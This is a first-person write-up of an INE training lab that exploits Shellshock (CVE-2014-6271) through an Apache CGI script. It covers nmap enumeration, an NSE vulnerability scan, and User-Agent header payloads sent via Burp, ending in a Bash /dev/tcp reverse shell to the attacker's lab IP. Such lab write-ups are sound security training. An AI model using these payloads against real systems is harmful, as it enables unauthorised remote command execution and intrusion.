Overview
This was an INE lab focused on exploiting Shellshock, also known as CVE-2014-6271.
The target was running Apache with a CGI script. The goal was to find the CGI endpoint, confirm command execution, then use it to get a reverse shell.
The attack path was:
Apache -> CGI script -> Shellshock scan -> Burp command execution -> reverse shell -> daemon
Target
| Item | Value |
|---|---|
| Hostname | demo.ine.local |
| Target IP | 192.113.112.3 |
| Attacker IP | 192.113.112.2 |
| Main vulnerability | CVE-2014-6271 / Shellshock |
Enumeration
I started with a basic service version scan.
Nmap scan: nmap -sV 192.113.112.3
| Port | Service | Version |
|---|---|---|
80/tcp |
HTTP | Apache httpd 2.4.6 |
After opening the website, it showed a basic under construction page.
Finding the CGI Endpoint
I checked the page source and noticed that the page was calling this endpoint:
CGI endpoint: /gettime.cgi
This was the important part of the lab. CGI scripts can pass HTTP headers into environment variables, and Shellshock abuses vulnerable Bash behavior when those variables are processed.
Confirming Shellshock
I searched for the Nmap NSE script related to Shellshock.
Find NSE script: find / -type f -iname "*.nse" 2>/dev/null | grep -i "shellshock"
The script was located at:
Result: /usr/share/nmap/scripts/http-shellshock.nse
Then I scanned the CGI endpoint directly.
Shellshock NSE scan: nmap -sV --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" 192.113.112.3
The scan confirmed that the endpoint was vulnerable.
Testing Command Execution
After confirming the vulnerability, I sent the request to Burp Repeater and modified the User-Agent header.
The first test was running id to confirm command execution.
| Part | Value |
|---|---|
| Header | User-Agent |
| Payload | () { :; }; echo; /bin/bash -c 'id' |
| Result | uid=1(daemon) gid=1(daemon) groups=1(daemon) |
This confirmed that the target was executing commands as the daemon user.
Getting a Reverse Shell
After confirming command execution, I started a Netcat listener.
Listener: nc -nvlp 1234
Then I replaced the User-Agent value with a Bash reverse shell payload.
Reverse shell payload: () { :; }; echo; /bin/bash -c 'bash -i >& /dev/tcp/192.113.112.2/1234 0>&1'
The listener received a connection from the target.
I confirmed access with whoami, id, and ls.
| Check | Result |
|---|---|
| User | daemon |
| Web directory files | gettime.cgi, index.html, static |
What I Learned
This lab was useful because it showed how Shellshock can be exploited through HTTP headers when a vulnerable CGI script is present.
The key part was finding /gettime.cgi. Without that endpoint, the Shellshock scan and Burp payload would not have had the right target path.
The main lesson is that old CGI functionality should be checked carefully during web enumeration, especially when Apache is running on a Unix-based system.